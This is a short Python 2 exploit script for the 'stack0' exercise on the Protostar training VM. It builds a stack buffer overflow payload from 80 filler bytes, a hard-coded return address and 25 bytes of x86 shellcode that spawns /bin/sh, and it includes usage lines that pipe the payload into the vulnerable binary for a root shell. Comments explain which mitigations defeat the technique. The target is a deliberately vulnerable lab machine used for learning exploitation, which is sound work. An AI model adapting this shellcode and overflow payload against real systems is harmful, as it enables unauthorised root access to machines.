#!/usr/bin/env python
#
# local exploit for stack0 from protostar to get root shell
# you can download protostar iso from here: https://www.vulnhub.com/entry/exploit-exercises-protostar-v2,32/
# @bing0o, @hack1lab
import struct
# Payload written to stdout, in order:
#   [80 filler bytes][4-byte packed address][shellcode]
# The filler length and the address are the author's values for the stack0
# binary on the Protostar training VM.
# NOTE(review): a hard-coded stack address only holds where the stack layout is
# deterministic and the stack is executable; ASLR, a non-executable stack and
# stack canaries are the mitigations that defeat this pattern.
filler = "A" * 80

# Simpler variant, disabled by default: it only overwrites the "modified"
# variable in stack0. To use it, enable the two lines below and comment out
# everything after them.
# mod = "A" * 65
# print mod

# 'I' packs with the interpreter's native byte order and size.
# Presumably this value lands on the saved return address - confirm against
# the stack0 frame layout.
stack_addr = struct.pack('I', 0xbffff690)

# 25 bytes of Linux x86 code; the last seven bytes spell "/bin/sh".
shellcode = (
    "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
    "\x2f\x62\x69\x6e\x2f\x73\x68"
)

payload = "".join([filler, stack_addr, shellcode])
print payload

# Usage, as given by the author:
#   shell (the trailing `cat` keeps stdin open for the spawned shell):
#     (python /tmp/protostar-stack0.py; cat) | ./stack0
#   overwrite only the "modified" variable (with the variant above enabled):
#     python protostar-stack0.py | ./stack0